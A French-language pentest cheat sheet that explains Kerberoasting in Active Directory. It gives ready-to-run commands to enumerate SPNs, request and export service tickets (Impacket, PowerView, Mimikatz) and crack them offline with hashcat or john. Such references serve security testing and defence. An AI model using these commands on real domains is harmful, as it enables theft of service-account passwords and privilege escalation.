Kerberoast

Kerberoast est une attaque basée sur la demande de TGS et sur les attributs SPN de comptes Active Directory.

Pour obtenir un Service Ticket (ST), un client interroge le KDC en présentant son Ticket Granting Ticket (TGT) valide et en indiquant le service visé via le champ sname. Ce champ peut être renseigné sous plusieurs formes (par exemple SPN, sAMAccountName, UPN). Si le TGT est accepté et que le service existe, le KDC renvoie le ST, qui est chiffré avec la clé dérivée du mot de passe (NT hash) du compte de service.

Un attaquant disposant d’un TGT et connaissant le nom du service peut donc demander ce ST puis l’attaquer hors-ligne pour tenter de retrouver le mot de passe du compte de service, attaque connue sous le nom de Kerberoasting.

Le risque est particulièrement élevé lorsque le compte de service possède des privilèges élevés et utilise un mot de passe faible. Cette attaque requiert des identifiants valides au sein du domaine.

Identifier les comptes vulnérables#

GetUserSPNs.py -request -dc-ip $DC_IP $DOMAIN/$USER -outputfile $OUTPUT_FILE
GetUserSPNs.py -request -dc-ip $DC_IP $DOMAIN/$USER -hashes $LM:$NT -outputfile $OUTPUT_FILE

# Récolter les SPN
Get-NetUser -SPN | select serviceprincipalname # PowerView
.\GetUserSPNs.ps1 # Autre script dédié
​
# Demander un ticket TGS en mémoire à partir d'un SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" # Example: MSSQLSvc/mgmt.domain.local
​
# Lister les tickets Kerberos en mémoire
klist
​
# Exporter les tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'

Casser les tickets#

Il devient ensuite possible d’essayer de les casser hors ligne grâce à des attaques par dictionnaires ou par force brute.

hashcat -m 13100 $HASH $WORDLIST

john --format=krb5tgs --wordlist=$WORDLIST $HASH

Voir le guide dédié aux attaques par bruteforce